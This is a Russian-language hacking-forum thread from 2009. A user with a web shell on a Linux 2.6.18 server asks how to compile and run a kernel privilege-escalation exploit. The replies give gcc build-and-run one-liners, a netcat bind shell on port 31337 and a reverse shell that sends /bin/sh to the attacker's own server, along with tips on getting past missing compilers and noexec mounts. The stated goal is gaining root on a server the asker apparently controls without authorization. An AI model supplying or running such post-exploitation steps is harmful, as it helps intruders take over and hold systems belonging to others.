ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Linux Kernel 2.6.18 vS Exploit
  #1  
Старый 18.05.2009, 22:17
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию Linux Kernel 2.6.18 vS Exploit

Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?
 

  #2  
Старый 18.05.2009, 22:20
Аватар для Shaitan-Devil
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Попробуй
Код:
gcc -o sploit sploit.c; chmod +x sploit;./sploit
НУ или
Код:
gcc -o sploit sploit.c; chmod 777 sploit;./sploit
ну или без chmod
Код:
gcc -o sploit sploit.c;./sploit
А вообще в интернете много статей.

Последний раз редактировалось Shaitan-Devil; 18.05.2009 в 22:28..
 

  #3  
Старый 18.05.2009, 22:28
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.
 

  #4  
Старый 18.05.2009, 22:31
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

тебе как минимум надо получить нормальный шелл
 

  #5  
Старый 18.05.2009, 22:35
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval()
PHP код:
system('gcc -o exploit exploit.c;'); 
PS: в линухе я полный 0
 

  #6  
Старый 18.05.2009, 22:36
Аватар для Shaitan-Devil
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Нужно сделать бекконнект или забиндить порт.
П.С. Или нет?=\
 

  #7  
Старый 18.05.2009, 22:44
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
PS: в линухе я полный 0
это чувствуется)
$ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута.
Цитата:
У меня Веб-Шелл, а не SSH доступ
забинди порт или сделай бек-конект.
Цитата:
gcc почему-то там не пашет
что выведет which gcc?
 

  #8  
Старый 18.05.2009, 23:03
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

which gcc cc cpp

бинди порт, например неткатом
nc -l -p 31337 -e /bin/sh &

потом у себя неткатом
nc -v www.site.com 31337

Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла

В ином случае делай бекконект
у себя на дедике открываешь порт
nc -l -p 31337

на сервер который собираешься рутать
nc -v www.dedik.com 31337 -e /bin/sh &

Удачи =)
 

  #9  
Старый 18.05.2009, 23:12
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Нет факт что:
-- на хосте присутсвует gcc(мало вероятно);
-- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc);
Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много).
 

  #10  
Старый 18.05.2009, 23:19
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

AkyHa_MaTaTa, уж если ему не хватит прав на gcc, то ещё более вероятно что там noexec
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ